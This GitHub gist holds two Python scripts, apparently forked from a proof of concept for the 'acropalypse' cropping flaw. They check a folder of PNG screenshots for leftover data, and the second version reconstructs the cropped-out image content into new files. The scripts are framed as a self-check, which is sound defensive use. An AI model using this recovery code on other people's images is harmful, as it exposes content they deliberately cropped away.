Forked from DavidBuchanan314/acropalypse_matching_sha256.py
Last active
April 16, 2023 09:58
-
-
Save samicrusader/e4ea3d5d0a7fc44878d27fbc554a4bb5 to your computer and use it in GitHub Desktop.
check if a folder of screenshot got wikileaked by Android 10's undocumented API bullshit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import zlib | |
import os | |
import sys | |
import io | |
if len(sys.argv) != 4: | |
print(f"USAGE: {sys.argv[0]} phone_width phone_height wikileaks/") | |
exit() | |
print('this tool gonna take a bit depending on how big and girthy your screenshots( folder) is') | |
PNG_MAGIC = b"\x89PNG\r\n\x1a\n" | |
def parse_png_chunk(stream): | |
size = int.from_bytes(stream.read(4), "big") | |
ctype = stream.read(4) | |
body = stream.read(size) | |
csum = int.from_bytes(stream.read(4), "big") | |
assert(zlib.crc32(ctype + body) == csum) | |
return ctype, body | |
def pack_png_chunk(stream, name, body): | |
stream.write(len(body).to_bytes(4, "big")) | |
stream.write(name) | |
stream.write(body) | |
crc = zlib.crc32(body, zlib.crc32(name)) | |
stream.write(crc.to_bytes(4, "big")) | |
for item in os.listdir(sys.argv[3]): | |
orig_width = int(sys.argv[1]) | |
orig_height = int(sys.argv[2]) | |
wikileaked = False | |
f_in = open(os.path.join(sys.argv[3], item), "rb") | |
magic = f_in.read(len(PNG_MAGIC)) | |
try: | |
assert(magic == PNG_MAGIC) | |
except: | |
continue | |
# find end of cropped PNG | |
while True: | |
ctype, body = parse_png_chunk(f_in) | |
if ctype == b"IEND": | |
break | |
# grab the trailing data | |
trailer = f_in.read() | |
# find the start of the nex idat chunk | |
try: | |
next_idat = trailer.index(b"IDAT", 12) | |
except ValueError: | |
continue | |
else: | |
wikileaked = True | |
# skip first 12 bytes in case they were part of a chunk boundary | |
idat = trailer[12:next_idat-8] # last 8 bytes are crc32, next chunk len | |
stream = io.BytesIO(trailer[next_idat-4:]) | |
while True: | |
ctype, body = parse_png_chunk(stream) | |
if ctype == b"IDAT": | |
idat += body | |
wikileaked = True | |
elif ctype == b"IEND": | |
break | |
else: | |
break | |
idat = idat[:-4] # slice off the adler32 | |
bitstream = [] | |
for byte in idat: | |
for bit in range(8): | |
bitstream.append((byte >> bit) & 1) | |
# add some padding so we don't lose any bits | |
for _ in range(7): | |
bitstream.append(0) | |
byte_offsets = [] | |
for i in range(8): | |
shifted_bytestream = [] | |
for j in range(i, len(bitstream)-7, 8): | |
val = 0 | |
for k in range(8): | |
val |= bitstream[j+k] << k | |
shifted_bytestream.append(val) | |
byte_offsets.append(bytes(shifted_bytestream)) | |
# bit wrangling sanity checks | |
assert(byte_offsets[0] == idat) | |
assert(byte_offsets[1] != idat) | |
# prefix the stream with 32k of "X" so backrefs can work | |
prefix = b"\x00" + (0x8000).to_bytes(2, "little") + (0x8000 ^ 0xffff).to_bytes(2, "little") + b"X" * 0x8000 | |
for i in range(len(idat)): | |
truncated = byte_offsets[i%8][i//8:] | |
# only bother looking if it's (maybe) the start of a non-final adaptive huffman coded block | |
if truncated[0]&7 != 0b100: | |
continue | |
wikileaked = True | |
d = zlib.decompressobj(wbits=-15) | |
try: | |
decompressed = d.decompress(prefix+truncated) + d.flush(zlib.Z_FINISH) | |
decompressed = decompressed[0x8000:] # remove leading padding | |
if d.eof and d.unused_data in [b"", b"\x00"]: # there might be a null byte if we added too many padding bits | |
# XXX: maybe there could be false positives and we should keep looking? | |
break | |
except zlib.error as e: # this will happen almost every time | |
#print(e) | |
pass | |
if wikileaked: | |
print('wikileaked:', os.path.join(sys.argv[3], item)) | |
print('alright bro if u got wikileaked you should check if those screenshots u sent anywhere b4 you get doxed ππππππ') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# THIS VERSION DUMPS THE LEAKED IMAGE | |
import zlib | |
import os | |
import sys | |
import io | |
if len(sys.argv) != 4: | |
print(f"USAGE: {sys.argv[0]} phone_width phone_height wikileaks/") | |
exit() | |
print('this tool gonna take a bit depending on how big and girthy your screenshots( folder) is') | |
PNG_MAGIC = b"\x89PNG\r\n\x1a\n" | |
def parse_png_chunk(stream): | |
size = int.from_bytes(stream.read(4), "big") | |
ctype = stream.read(4) | |
body = stream.read(size) | |
csum = int.from_bytes(stream.read(4), "big") | |
assert(zlib.crc32(ctype + body) == csum) | |
return ctype, body | |
def pack_png_chunk(stream, name, body): | |
stream.write(len(body).to_bytes(4, "big")) | |
stream.write(name) | |
stream.write(body) | |
crc = zlib.crc32(body, zlib.crc32(name)) | |
stream.write(crc.to_bytes(4, "big")) | |
for item in os.listdir(sys.argv[3]): | |
orig_width = int(sys.argv[1]) | |
orig_height = int(sys.argv[2]) | |
wikileaked = False | |
f_in = open(os.path.join(sys.argv[3], item), "rb") | |
magic = f_in.read(len(PNG_MAGIC)) | |
try: | |
assert(magic == PNG_MAGIC) | |
except: | |
continue | |
# find end of cropped PNG | |
while True: | |
ctype, body = parse_png_chunk(f_in) | |
if ctype == b"IEND": | |
break | |
# grab the trailing data | |
trailer = f_in.read() | |
# find the start of the nex idat chunk | |
try: | |
next_idat = trailer.index(b"IDAT", 12) | |
except ValueError: | |
continue | |
else: | |
wikileaked = True | |
# skip first 12 bytes in case they were part of a chunk boundary | |
idat = trailer[12:next_idat-8] # last 8 bytes are crc32, next chunk len | |
stream = io.BytesIO(trailer[next_idat-4:]) | |
while True: | |
ctype, body = parse_png_chunk(stream) | |
if ctype == b"IDAT": | |
idat += body | |
wikileaked = True | |
elif ctype == b"IEND": | |
break | |
else: | |
break | |
idat = idat[:-4] # slice off the adler32 | |
bitstream = [] | |
for byte in idat: | |
for bit in range(8): | |
bitstream.append((byte >> bit) & 1) | |
# add some padding so we don't lose any bits | |
for _ in range(7): | |
bitstream.append(0) | |
byte_offsets = [] | |
for i in range(8): | |
shifted_bytestream = [] | |
for j in range(i, len(bitstream)-7, 8): | |
val = 0 | |
for k in range(8): | |
val |= bitstream[j+k] << k | |
shifted_bytestream.append(val) | |
byte_offsets.append(bytes(shifted_bytestream)) | |
# bit wrangling sanity checks | |
assert(byte_offsets[0] == idat) | |
assert(byte_offsets[1] != idat) | |
# prefix the stream with 32k of "X" so backrefs can work | |
prefix = b"\x00" + (0x8000).to_bytes(2, "little") + (0x8000 ^ 0xffff).to_bytes(2, "little") + b"X" * 0x8000 | |
for i in range(len(idat)): | |
truncated = byte_offsets[i%8][i//8:] | |
# only bother looking if it's (maybe) the start of a non-final adaptive huffman coded block | |
if truncated[0]&7 != 0b100: | |
continue | |
wikileaked = True | |
d = zlib.decompressobj(wbits=-15) | |
try: | |
decompressed = d.decompress(prefix+truncated) + d.flush(zlib.Z_FINISH) | |
decompressed = decompressed[0x8000:] # remove leading padding | |
if d.eof and d.unused_data in [b"", b"\x00"]: # there might be a null byte if we added too many padding bits | |
# XXX: maybe there could be false positives and we should keep looking? | |
break | |
except zlib.error as e: # this will happen almost every time | |
#print(e) | |
pass | |
if wikileaked: | |
out = open(os.path.join(sys.argv[3], item+'_wikileaked.png'), "wb") | |
out.write(PNG_MAGIC) | |
ihdr = b"" | |
ihdr += orig_width.to_bytes(4, "big") | |
ihdr += orig_height.to_bytes(4, "big") | |
ihdr += (8).to_bytes(1, "big") # bitdepth | |
ihdr += (2).to_bytes(1, "big") # true colour | |
ihdr += (0).to_bytes(1, "big") # compression method | |
ihdr += (0).to_bytes(1, "big") # filter method | |
ihdr += (0).to_bytes(1, "big") # interlace method | |
pack_png_chunk(out, b"IHDR", ihdr) | |
# fill missing data with solid magenta | |
reconstructed_idat = bytearray((b"\x00" + b"\xff\x00\xff" * orig_width) * orig_height) | |
# paste in the data we decompressed | |
reconstructed_idat[-len(decompressed):] = decompressed | |
# one last thing: any bytes defining filter mode may | |
# have been replaced with a backref to our "X" padding | |
# we should fine those and replace them with a valid filter mode (0) | |
for i in range(0, len(reconstructed_idat), orig_width*3+1): | |
if reconstructed_idat[i] == ord("X"): | |
#print(f"Fixup'd filter byte at idat byte offset {i}") | |
reconstructed_idat[i] = 0 | |
pack_png_chunk(out, b"IDAT", zlib.compress(reconstructed_idat)) | |
pack_png_chunk(out, b"IEND", b"") | |
print('wikileaked:', os.path.join(sys.argv[3], item)) | |
print('alright bro if u got wikileaked you should check if those screenshots u sent anywhere b4 you get doxed ππππππ') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
if some photos wont open (try using feh) you can run them through https://github.com/sherlly/PCRT/blob/6c7b909af96e1cf87299986e7b1136f5c81c80e8/PCRT.py and it might fix them